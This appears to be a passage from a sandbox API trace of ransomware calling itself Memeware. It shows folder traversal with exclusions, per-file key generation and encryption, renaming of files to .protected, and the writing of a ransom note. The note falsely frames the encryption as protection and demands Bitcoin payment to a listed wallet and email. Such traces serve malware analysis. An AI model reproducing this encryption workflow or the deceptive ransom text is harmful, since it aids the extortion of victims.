(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.044] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.045] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.045] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.045] CloseHandle (hObject=0x164) returned 1 [0079.045] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.045] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0079.045] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0079.045] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0079.045] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0079.045] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0079.045] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no") returned 141 [0079.045] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0079.045] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0079.045] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\*") returned 143 [0079.045] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.045] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.045] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.045] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.045] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.045] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.045] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\.") returned 143 [0079.045] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.045] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.046] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.046] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.046] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.046] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.046] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.046] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\..") returned 144 [0079.046] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.046] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.046] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.046] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.046] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.046] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.046] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.046] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.046] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json") returned 155 [0079.046] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.046] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.046] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.046] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.047] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json") returned 155 [0079.047] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.047] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json") returned 155 [0079.047] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.047] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json") returned 155 [0079.047] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.047] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc3, lpOverlapped=0x0) returned 1 [0079.048] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.048] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc3, lpOverlapped=0x0) returned 1 [0079.048] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.048] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.048] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.048] CloseHandle (hObject=0x168) returned 1 [0079.048] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.protected") returned 165 [0079.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.protected")) returned 1 [0079.049] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.049] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.049] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\RESTORE_FILES.txt") returned 159 [0079.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.049] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.049] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.050] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.050] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.050] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.050] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.050] CloseHandle (hObject=0x164) returned 1 [0079.050] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.050] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0079.050] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0079.051] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0079.051] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0079.051] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0079.051] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl") returned 141 [0079.051] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0079.051] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0079.051] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\*") returned 143 [0079.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.051] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.051] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.051] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.051] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.051] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.051] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\.") returned 143 [0079.051] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.051] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.051] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.051] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.051] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.051] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.051] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.051] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\..") returned 144 [0079.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.051] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.051] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.051] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.051] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.052] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.052] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.052] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0079.052] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.052] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.052] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.052] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0079.052] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0079.052] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.052] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0079.052] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.052] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.053] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.053] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.053] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.053] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.053] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.053] CloseHandle (hObject=0x168) returned 1 [0079.055] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.protected") returned 165 [0079.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.protected")) returned 1 [0079.055] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.055] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.055] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\RESTORE_FILES.txt") returned 159 [0079.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.055] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.055] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.056] lstrlenA 